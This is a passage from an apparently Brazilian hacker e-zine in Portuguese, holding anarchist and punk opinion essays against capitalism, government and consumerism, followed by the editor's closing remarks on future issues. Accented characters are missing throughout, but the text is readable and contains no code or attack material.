contradiz isso. No sistema atual precisamos viver sob diversas leis,
estas sempre do vantagem para certa classe social. Todos somos
iguais e portanto temos os mesmos direitos, ningum vale mais
que o outro. A democracia no nos garante isso. Alm de vivermos sob um
governo, ainda temos que enfrentar certos padres sociais, onde
percebemos a presena de muito preconceito. O sistema anarquista 
a maneira de viver livre, do jeito que voc realmente
quer ser e que se sente melhor. Hoje todos so como marionetes: vivem sob os
padres impostos pelo governo e pela sociedade, seguindo leis, quase
sempre injustas e que favorecem sempre certo grupo. Na
democracia, h muita desigualdade social, onde os ricos
tornam-se cada vez mais ricos, e os pobres, cada vez mais pobres. As classes
altas s se preocupam com elas mesmas, no se preocupam com o
povo e ainda fazem iluso a estes. Eles passam uma imagem de
felicidade, dizendo que tudo est certo . Muitos acabam
achando que est tudo certo e aceitam tudo como est. O governo s quer
dinheiro e poder, por isso o dinheiro hoje  a desgraa do mundo. 
prefervel viver livre, na "desordem", do que viver preso, na
disciplina.


PENSAMENTOS DE UM ANARCO-PUNK

 O mundo esta uma grande merda, e a humanidade so as moscas 
explorando cada vez mais esse monte de merda at ela se decompor.
E ns? Quem somos nesse imenso circulo vicioso? Somos o resto da 
humanidade que ainda no explora o monte de merda (o planeta) que 
ainda restou.
As pessoas dizem que somos a escria do mundo, que somos contra tudo 
de bom na sociedade, que somos drogados e baderneiros que no 
conseguimos se integrar na sociedade. As vezes eu tento intender o 
que as pessoas vem de bom na sociedade, que cada dia que passa, 
decai mais um pouco.
 O mundo esta cheio de dinheiro na mo de alguns poucos, cheio de 
guerras inteis para provar o poder de alguns, cheio de doenas e 
cientistas mercenrios, pessoas que s querem ajudar pr dinheiro e 
fama, pr prestigio e poder. Na verdade so todos hipcritas que 
exploram as pessoas, a natureza, o mundo em si em nome de um mundo 
melhor.
 No somos contra tudo de bom na sociedade e sim contra tudo de 
ruim nela, s que as pessoas no podem ver o que  ruim pois 
isso seria acabar com sua prpria integrao na sociedade, acabar 
com seu conforto e segurana.
 Talvez ns sejamos estranhos para as pessoas comuns, mais as 
pessoas comuns so incompreensveis para ns. Porque no meio de 
tanta desgraa, fome, doenas, guerras, represso, de tudo que 
somos impostos a passar, a sociedade cada vez mais quer estar 
integrada no mundo capitalista que  em parte o culpado pr todo 
mau existente na sociedade? Mais o grande culpado realmente  a 
sociedade que se deixa enganar pr polticos que falam bonito e 
lhes promete um mar de rosas, propagandas e mais propagandas que 
lhe fazem crer que tudo pode ser bom, por um falso retrato do 
mundo que a mdia lhe passa.
 Parece que no percebemos que tudo isso  para tirar nosso 
dinheiro e nos manter em controle em nossas casas, trabalhando e 
estudando para servir de escravo para o sistema.
 Sempre o dinheiro! As pessoas fazem tudo pr dinheiro, querem 
sempre ter mais dinheiro. Acham que o dinheiro vai resolver todos 
os problemas delas. Mas na verdade  o dinheiro que causa os 
problemas e no sua falta. Se no houvesse dinheiro no haveria 
disputas, no haveria perdedores e conseqentemente no haveria 
pobreza e nem ricos.
 Todas as pessoas so iguais independente de cor, sexo, esttica 
e ento porque existem desigualdades no mundo? Porque existe a 
hierarquia? Porque existem mais prestigiados?  Talvez seja porque 
tem mais dinheiro ou mais medalhas ou um pedao de papel 
determinando quem  melhor ou pior.
 Talvez quando as pessoas perceberem que fizeram tudo errado seja 
tarde demais, o mundo j tenha se afundado num posso de dinheiro 
e fanatismo, religies e preconceito, guerras e represso.
 Pr isso no nos integramos, porque somos contra todo meio de vida 
estpido da sociedade. O sistema te escraviza de forma invisvel, 
mais se fizer um pouco de esforo ver que sua vida  a coisa mais 
descartvel perante o sistema, que s quer mais poder, controle e 
dinheiro, e usa tudo que esta em sua volta para controla-lo, para 
fazer voc trabalhar e pagar seus impostos, fazer com que voc no 
perceba que esta sendo totalmente controlado atravs da mdia, 
da religio, das falsas idias que so transmitidas pr todos em 
sua volta.
 Pr isso lutamos contra o sistema, contra as luxurias da sociedade 
capitalista. Pr isso ns nos vestimos diferente, no pagamos 
impostos, no votamos e nem fazemos o que nos mandam. Somos contra 
leis que te privam de fazer o que quer consigo mesmo, no temos 
religio pois achamos que a religio  uma forma de bitolao da 
sociedade capitalista para te controlar e tirar seu dinheiro e 
pensamentos.
  tudo uma forma de protesto.
 O sistema pode controlar as pessoas, minha famlia, meus amigos 
e podem at me controlar mais nunca vo controlar minha mente.
         ANARQUIA SEMPRE!


MOVIMENTO PUNK

 A contestao contra o sistema de coisas tornou forma ideolgica atravs
do Punk.
 Com o visual fugindo dos padres que a sociedade impe atravs do modismo,
mostrando sua revolta pelo corte de cabelo  moicano (ou cabelos espetados) 
coloridos, roupas velhas surradas (em oposio ao consumismo), jaquetas 
arrebitadas com frases de indignao s injustias do Estado repressor e a 
atitude subversiva, se mostra o PUNK.
 Esse movimento no fica calado, acomodado, como a maioria dos jovens e o 
povo em geral, fazendo manifestaes, panfletagens, boicotes, passeatas: 
mostrando sua cultura e seu repdio a todas as formas de fascismo, 
nazismo e racismo, autoritarismo, sexismo e comando; vendo como soluo 
a autogesto (ou seja anarquia) para a libertao dos povos, raas, homens 
e mulheres.
 Em palavras mais claras, autogesto seria a organizao dos povos sem 
fronteiras nem lideranas autoritrias e partidrias, com plena igualdade, 
onde todos participariam da resoluo dos problemas sociais. O punk tambm 
mostra sua cultura anticapitalista pelo FANZINE (jornal poltico-alternativo), 
pela msica HARDCORE, som simples e direto, no comercializvel, trazendo 
propostas polticas, seu comportamento livre e objetivo, fazendo com que 
o Punk NO SEJA UMA MODA e sim um modo de vida e pensamento.
 Atualmente o movimento atua com outros oprimidos grupos como: homossexuais, 
por achar que todos tm o direito de opo sexual sem ser discriminado; 
grupos de negros, feministas e outros grupos de atividades alternativas e 
libertrias. Tambm mantm ligao com outros punks do Brasil e mundo, levando 
a cultura internacionalista, no patriota.
 Saiba e conscientize-se que Punk no  baguna, muito pelo contrrio  um 
movimento cultural de luta e ao direta, de liberdade de expresso e de 
comportamento. O movimento que surgiu a quase duas dcadas, como contestao, 
evoluiu e evolui at hoje...


                                                                kbytes
     					                                  kbytes@zines-br.com
.:x| ------------------------------------------------------------------------------ |x:.










SETOR [28]
==[ Palavras finais  ]==
==[ Por Gotoxy       ]==

Ae! 
infelizmente chegamos no final.. :[

[x] ATENCAO: [x]

Agora,
o novo esquema eh o seguinte: nao vamos marcar data das edicoes seguintes! 
Pois, poderemos fazer uma edicao rapida e publica-la ou entao demorarmos 
um pouco mais para publicarmos a edicoes. 
	Se demorar muito, nao ache q o zinesbr acabou. Caso isso ocorra, 
pretendo que nao, nos avisaremos antes. Vamos fazer o maximo possivel 
para nao demorar muuuito para sairem as novas edicoes do zinesbr. 

	O motivo mais provavel para as edicoes demorarem a sairem, 
sao: eu nao fico no pc 24 hours. Tenho q estudar, sair pra rua 
(curti muieh), assisti dbz (rulez) e outras coisas boas q existem 
de bom em nossas vidas. =]
	chega de blablabla e tchau
      Ha!! Continuem fucando, nao parem de fucar, o futuro depende
de voce, caro leitor fucador!
			
Ate a proxima Edicao !
__________________________________________________________________________________________
---------------------------------------------ZinesBr--------------------------------------

        				  Perguntas? Duvidas? Sugestoes? 
                                     zinesbr@zines-br.com
						      
						     	 Home Page
						    www.zines-br.com

  					      
   	                                  6666666666666                    
                  6666                66666666666666666            6666  
                6666666              6666666666666666666          6666666
                666666666           666666666666666666666       666666666
                     66666666       666666666666666666666    6666666     
                        666666      666     66666     666  66666         
                            666666  66   6   666   6   66 666            
                               6666 666     66666     666 6              
                                  66 666666666 666666666 66              
                   -[ ZiNeS-Br ]-       6666     6666         -[ ZiNeS-Br ]-                    
                                      66 66666666666 66                  
                  66666         666666 66           66 666666         666
                  666666    66666666   666         666   66666666    6666
                   6666666666666        66666   66666        66666666666 
                     66666666            66666666666            6666666  
                    666666                 6666666                666666 
                     6666                                          6666  
                                  http://www.zines-br.com
                                                                                               
    								         	